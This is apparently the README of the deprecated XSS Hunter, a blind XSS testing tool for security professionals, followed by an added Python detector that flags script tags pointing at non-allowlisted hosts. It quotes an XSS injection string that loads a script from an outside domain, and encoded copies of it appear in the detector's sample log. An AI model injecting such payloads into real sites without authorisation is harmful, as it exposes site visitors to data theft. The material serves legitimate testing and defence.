DEPRECATED - TRY THE NEW EXPRESS VERSION

See here for more info: https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter Source Code

This is a portable version of the source code running on https://xsshunter.com. It is designed to be easy to install on any server, for security professionals and bug bounty hunters who wish to test for XSS in a much more powerful way.

If you don't want to set up this software and would rather just start testing, see https://xsshunter.com.

Requirements

Setup

Please see https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ for information on how to set up XSS Hunter on your own server.

Summary of Functionality

Upon signing up you will create a special short domain such as yoursubdomain.xss.ht which identifies your XSS vulnerabilities and hosts your payload. You then use this subdomain in your XSS testing, using injection attempts such as "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.
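
A defender-side check for the injection string above, as an added example that is not part of the XSS Hunter code base: it scans request or stored-input text for script tags whose src points at a host outside an allowlist, undoing nested URL encoding first. The allowlisted host, the function names and the log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Assumption: hosts this application legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"static.example.com"}

# <script ... src=VALUE> where VALUE is double-quoted, single-quoted or bare.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)

def decode_repeatedly(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding; stop once nothing changes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def external_script_hosts(text):
    """Hosts named by <script src=...> tags in text that are not allowlisted."""
    hosts = []
    for match in SCRIPT_SRC.finditer(decode_repeatedly(text)):
        src = next(g for g in match.groups() if g is not None)
        try:
            # "//host/path" is a network-path reference, so hostname is set.
            host = (urlsplit(src).hostname or "").lower()
        except ValueError:  # malformed authority, e.g. an unclosed "["
            continue
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            hosts.append(host)
    return hosts

def scan(lines):
    """Return (line_number, host) for every non-allowlisted script host found."""
    return [(n, h) for n, line in enumerate(lines, 1)
            for h in external_script_hosts(line)]

# Constructed sample input: plain, single-encoded, double-encoded, allowlisted.
SAMPLE_LOG = [
    "GET /search?q=shoes HTTP/1.1",
    "GET /search?q=%22%3E%3Cscript+src%3D%2F%2Fyoursubdomain.xss.ht%3E%3C%2Fscript%3E HTTP/1.1",
    "POST /contact name=%253Cscript%2520src%253D%2522https%253A%252F%252FYourSubdomain.xss.ht%252Fx%2522%253E",
    "GET /page?html=%3Cscript+src%3D%22https%3A%2F%2Fstatic.example.com%2Fapp.js%22%3E HTTP/1.1",
]
```

Calling scan(SAMPLE_LOG) reports lines 2 and 3; the regex also matches attributes such as data-src, so treat hits as leads to review rather than confirmed injections.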

Features

Notable Exploits

Want to Contribute?

All code was created by me and (for that reason) is likely not best practice and definitely in need of optimization/cleanup. Any pull requests are appreciated!